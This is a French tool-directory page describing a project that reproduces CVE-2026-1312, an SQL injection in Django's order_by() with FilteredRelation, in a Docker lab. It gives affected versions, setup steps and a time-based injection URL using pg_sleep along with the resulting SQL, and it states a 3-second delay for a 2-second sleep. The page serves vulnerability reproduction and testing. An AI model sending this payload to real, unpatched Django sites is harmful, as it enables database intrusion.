Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1312 — Reproduit CVE-2026-1312, une vulnérabilité d'injection SQL dans Django, avec un environnement Dockerisé et un PoC étape par étape pour les tests de sécurité. | Kitploit
Outils/GitHubGitHub/sw0rd1ight/cve-2026-1312
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

Reproduit CVE-2026-1312, une vulnérabilité d'injection SQL dans Django, avec un environnement Dockerisé et un PoC étape par étape pour les tests de sécurité.

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-1312 est une vulnérabilité critique d'injection SQL dans Django : lorsqu'un alias de colonne contenant un point est utilisé dans QuerySet.order_by(), combiné à une construction dynamique de requête via un dictionnaire avec FilteredRelation, un attaquant peut injecter du SQL malveillant

Versions affectées :

  • Branche Django 6.0 : versions antérieures à 6.0.2
  • Branche Django 5.2 : versions antérieures à 5.2.11
  • Branche Django 4.2 : versions antérieures à 4.2.28

Démarrage de l'environnement

Ce projet de vulnérabilité utilise le devcontainer de vscode pour sa construction

1️⃣ Ouvrir le projet Ouvrez le répertoire racine du projet existant (contenant le dossier .devcontainer) avec VS Code.

2️⃣ Rouvrir le conteneur (construire le Dev Container)

Appuyez sur Ctrl+Shift+P (Windows/Linux) ou Cmd+Shift+P (Mac)

Saisissez Remote-Containers: Reopen in Container

VS Code lira la configuration .devcontainer et construira le conteneur (la première construction peut prendre quelques minutes)

⚠️ Si le Dockerfile ou les dépendances ont été mis à jour, vous pouvez choisir Remote-Containers: Rebuild Container pour garantir l'utilisation de l'environnement le plus récent.

3️⃣ Exécuter le serveur de développement Django

Ouvrez la palette de commandes Ctrl+Shift+P

Saisissez Tasks: Run Task

Sélectionnez django:start (la tâche est déjà configurée dans .vscode/tasks.json)

Cette tâche démarrera le serveur de développement Django dans le conteneur

Il écoute par défaut sur 0.0.0.0:8086

4️⃣ Ouvrir le navigateur et accéder au projet

Ouvrez le navigateur et accédez à :

http://localhost:8086

5️⃣ Remarques

Première exécution :

Il peut être nécessaire d'exécuter les migrations de base de données :

root@kitploit:~
python manage.py migrate

Reproduction de la vulnérabilité

Accédez à l'interface /book/search, http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

Vous constaterez un délai de 3 secondes réussi

À ce moment, le SQL compilé par l'ORM Django en interne est

root@kitploit:~
SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
Télécharger l’outil